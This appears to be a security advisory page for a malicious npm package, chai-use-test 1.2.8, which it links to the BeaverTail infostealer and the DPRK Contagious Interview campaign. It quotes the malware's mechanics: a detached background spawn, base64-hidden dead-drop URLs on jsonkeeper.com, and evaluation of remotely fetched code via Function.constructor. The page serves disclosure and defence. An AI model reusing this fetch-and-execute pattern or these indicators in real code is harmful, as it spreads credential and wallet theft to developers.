VDB

GCVE-110-OSM-2026-3456

GCVE-110-OSM-2026-3456
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published May 1, 2026
Executes a 3-stage BeaverTail dropper chain on invocation: spawns a detached background process that fetches stage-2 JavaScript from `https://jsonkeeper.com/b/FAWPU` using campaign token `x-secret-key: _`, evaluates the payload via `Function.constructor('require', payload)(require)` granting full Node.js module access, then chains to `https://jsonkeeper.com/b/XSDSG` as stage 3. Delivers the BeaverTail infostealer associated with the DPRK Contagious Interview campaign; campaign pattern across 6+ sibling packages includes credential theft, browser data, and cryptocurrency wallet exfiltration. **Trigger**: when `require('chai-use-test')()` is called (middleware factory invocation), `index.js` executes `spawn('node', ['./lib/caller.js', JSON.stringify(args)], {detached:true, stdio:'ignore'})` + `child.unref()` — the background process survives parent exit. **Stage 1 — dead-drop resolver** (`lib/caller.js`): three base64-encoded literals decode inline to conceal all network indicators — the C2 URL (`https://jsonkeeper.com/b/FAWPU`), authentication header name (`x-secret-key`), and header value (`_`). Performs `axios.get(url, {headers: {'x-secret-key': '_'}})` and passes `response.data.cookie` to `new Function.constructor('require', payload)(require)` — granting the downloaded payload full Node.js module access and bypassing CSP. **Stage 2 — BeaverTail dropper** (MMSCRIPT_CHILD=1 fingerprint): fetches stage-3 payload from `https://jsonkeeper.com/b/XSDSG` and evaluates its `.cookie` field via the same eval pattern. **Stage 3**: consistent with BeaverTail infostealer tooling (DPRK Contagious Interview campaign). Downstream payload capabilities — credential theft, browser session data, cryptocurrency wallet files — are attributed from confirmed campaign-wide behavior across sibling packages from the same publisher.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownchai-use-test1.2.8 (affected)

References

vendor

Browse GCVE Records

72,921 records in the GCVE database · Updated July 15, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›